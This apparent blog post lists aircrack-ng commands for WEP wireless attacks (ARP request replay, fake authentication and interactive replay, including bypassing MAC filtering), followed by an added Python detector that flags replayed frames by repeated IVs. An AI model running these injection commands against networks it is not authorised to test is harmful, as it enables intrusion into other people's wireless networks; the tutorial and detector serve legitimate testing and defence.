Wireless Attacks: Part I – Penetration Testing in Linux

Common Commands Used in Aircrack-ng

Injection command

aireplay-ng -3 -b <AP MAC> -h <client MAC> ath0
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0
Fake Authentication Commands

aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <client MAC> ath0
aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

ARP Replay Attack

aireplay-ng -3 -b 00:13:10:30:24:9C mon0

Basic usage:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where:

-3 means standard ARP request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name
There are two methods of replaying an ARP request which was previously injected. The first and simplest method is to use the same command plus the "-r" option to read the output file from your last successful ARP replay.

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0
Where:

-3 means standard ARP request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless interface name
The second method is a special case of the interactive packet replay attack. It is presented here since it is complementary to the ARP request replay attack.

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0
Where:

-2 means interactive frame selection
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless card interface name
NOTE: Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. Thus, the advantage of the next technique (interactive replay) is that it gets around this control.
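From the defender's side, the ARP request replay described above has a recognisable signature: the injecting station retransmits one captured WEP frame unchanged, so the same source MAC, BSSID, IV and body length recur hundreds of times per second, whereas a legitimate client uses a fresh IV for every frame. The following detector is an added example (not part of the original post or of aircrack-ng); it assumes a wireless sensor that logs one (timestamp, source MAC, BSSID, IV, body length) record per data frame, and the capture it runs over is constructed here.

```python
from collections import defaultdict

AP_BSSID = "00:13:10:30:24:9C"      # access point MAC from the post's example
INJECT_SRC = "00:11:22:33:44:55"    # source MAC from the post's -h argument
NORMAL_SRC = "00:0F:B5:46:11:19"    # constructed: a legitimately associated client


def build_sample_capture():
    """Constructed sensor log: (ts, src, bssid, iv, body_len) per WEP data frame.
    The legitimate client emits a fresh IV per frame; the replayed ARP request
    keeps the captured IV and body length and repeats at ~100 frames/second."""
    frames = []
    for i in range(40):                                   # normal traffic
        frames.append((i * 0.5, NORMAL_SRC, AP_BSSID, f"{0x1A0000 + i:06x}", 68))
    for i in range(120):                                  # replay burst
        frames.append((10.0 + i * 0.01, INJECT_SRC, AP_BSSID, "4f2c91", 68))
    return sorted(frames)


def detect_arp_replay(frames, window_s=2.0, threshold=30):
    """Return one alert per (src, bssid, iv, body_len) tuple whose identical
    frame was observed at least `threshold` times within `window_s` seconds."""
    seen = defaultdict(list)
    for ts, src, bssid, iv, body_len in frames:
        seen[(src, bssid, iv, body_len)].append(ts)
    alerts = []
    for (src, bssid, iv, body_len), stamps in seen.items():
        stamps.sort()
        start = 0                                         # sliding window
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"src": src, "bssid": bssid, "iv": iv,
                               "count": len(stamps),
                               "first": stamps[0], "last": stamps[-1]})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_arp_replay(build_sample_capture()):
        print(f"possible ARP replay from {a['src']} to {a['bssid']}: "
              f"IV {a['iv']} repeated {a['count']} times "
              f"between t={a['first']:.2f}s and t={a['last']:.2f}s")
```

Because the access point re-encrypts the relayed broadcast with new IVs, the repeated-IV signature is visible only on frames from the injecting station, so the sensor must capture client-to-AP traffic, not just the AP's transmissions.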

The post Wireless Attacks: Part I appeared first on Penetration Testing in Linux. http://ift.tt/2ps2EAE http://ift.tt/2aM8QhC
